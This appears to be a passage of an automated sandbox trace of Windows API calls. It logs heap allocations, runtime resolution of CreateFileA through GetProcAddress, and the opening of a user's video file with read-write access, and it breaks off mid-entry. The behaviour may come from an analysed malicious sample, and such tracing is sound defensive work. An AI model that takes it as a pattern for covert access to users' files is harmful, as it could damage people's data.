[0192.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0192.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0192.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0192.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0192.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0192.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.904] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0192.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd7e0 [0192.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd7e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0192.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.905] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0192.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0192.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0192.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd7e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0192.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.905] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0192.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0192.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0192.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0192.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0192.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0192.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0192.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2f) returned 0x9bf310 [0192.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi", cchWideChar=47, lpMultiByteStr=0x9bf310, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi", lpUsedDefaultChar=0x0) returned 47 [0192.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0192.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0192.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0192.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.906] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cwkru.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0192.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0192.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0192.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0192.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0192.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0192.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0192.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0192.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=47, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0192.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5e) returned 0x9a5d10 [0192.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=47, lpWideCharStr=0x9a5d10, cchWideChar=47 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi") returned 47 [0192.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0192.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0192.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0192.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0192.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0192.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0192.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0192.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0192.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0192.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0192.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0192.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0192.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0192.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0192.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0192.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0192.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0192.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0192.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0192.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0192.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0192.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0192.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0192.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0192.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0192.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0192.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0192.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0192.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0192.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0192.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0192.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0192.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0192.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0192.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0192.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0192.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0192.910] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0192.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0192.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0192.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0192.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.912] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0192.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0192.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0192.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0192.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0192.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 